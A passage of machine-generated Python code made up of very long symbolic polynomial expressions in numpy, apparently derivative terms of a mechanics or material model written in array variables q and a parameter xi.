0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (60131984.3684659*xi**9*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(-51312626661.0909*(-5*q[0, 0] + 10*q[1, 0] - 5*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1623563577.94858*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 31963907.9408627*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 337119.341563786*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 1422.22222222222*q[0, 0] - 2844.44444444444*q[1, 0] + 1422.22222222222*q[2, 0]) + (-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*((-25283.9506172839*q[0, 0] + 12641.975308642*q[1, 0] + 12641.975308642*q[2, 0])*(-q[0, 0] + 2*q[1, 0] - q[2, 0]) + 2405279374.73864*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 30441817.0865359*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 898984.910836762*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 4810558749.47727*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*q[0, 0]**2 - 12641.975308642*q[0, 0]*q[1, 0] - 12641.975308642*q[0, 0]*q[2, 0] + 12641.975308642*q[1, 0]**2 - 12641.975308642*q[1, 0]*q[2, 0] + 12641.975308642*q[2, 0]**2 - 26.6666666666667) + (-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-q[0, 0] + 2*q[1, 0] - q[2, 0]) + 4810558749.47727*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 26.6666666666667*numpy.sqrt(3)) + 60131984.3684659*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 1522090.85432679*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 22474.6227709191*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 158.024691358025*q[0, 0]**2 + 158.024691358025*q[0, 0]*q[1, 0] + 158.024691358025*q[0, 0]*q[2, 0] - 158.024691358025*q[1, 0]**2 + 158.024691358025*q[1, 0]*q[2, 0] - 158.024691358025*q[2, 0]**2 + 1/3, 60131984.3684659*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1522090.85432679*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(-79.0123456790123*q[0, 0] - 79.0123456790123*q[1, 0] - 79.0123456790123*q[2, 0] - 35.5555555555555) + 22474.6227709191*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (60131984.3684659*xi**9*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(-51312626661.0909*(-5*q[0, 0] - 5*q[1, 0] + 10*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1623563577.94858*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 31963907.9408627*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 337119.341563786*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 1422.22222222222*q[0, 0] + 1422.22222222222*q[1, 0] - 2844.44444444444*q[2, 0]) + (-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*((-25283.9506172839*q[0, 0] + 12641.975308642*q[1, 0] + 12641.975308642*q[2, 0])*(-q[0, 0] - q[1, 0] + 2*q[2, 0]) + 2405279374.73864*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 30441817.0865359*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 898984.910836762*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 4810558749.47727*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*q[0, 0]**2 - 12641.975308642*q[0, 0]*q[1, 0] - 12641.975308642*q[0, 0]*q[2, 0] + 12641.975308642*q[1, 0]**2 - 12641.975308642*q[1, 0]*q[2, 0] + 12641.975308642*q[2, 0]**2 - 26.6666666666667) + (-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-q[0, 0] - q[1, 0] + 2*q[2, 0]) - 4810558749.47727*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 26.6666666666667*numpy.sqrt(3)) + 60131984.3684659*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 1522090.85432679*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 22474.6227709191*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 158.024691358025*q[0, 0]**2 + 158.024691358025*q[0, 0]*q[1, 0] + 158.024691358025*q[0, 0]*q[2, 0] - 158.024691358025*q[1, 0]**2 + 158.024691358025*q[1, 0]*q[2, 0] - 158.024691358025*q[2, 0]**2 + 1/3, (4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(6*q[3, 0] - 3*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 2106.99588477366*numpy.sqrt(3)*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])) + (2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 53.3333333333333*q[0, 0] - 26.6666666666667*q[1, 0] - 26.6666666666667*q[2, 0])*(-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 320703916.631818*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(6*q[3, 0] - 3*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 10147272.3621786*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 199774.424630392*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 2106.99588477366*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0]) - 8.88888888888889*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (60131984.3684659*xi**9*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 60131984.3684659*xi**9*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(6*q[3, 0] - 3*q[4, 0] - 3*q[5, 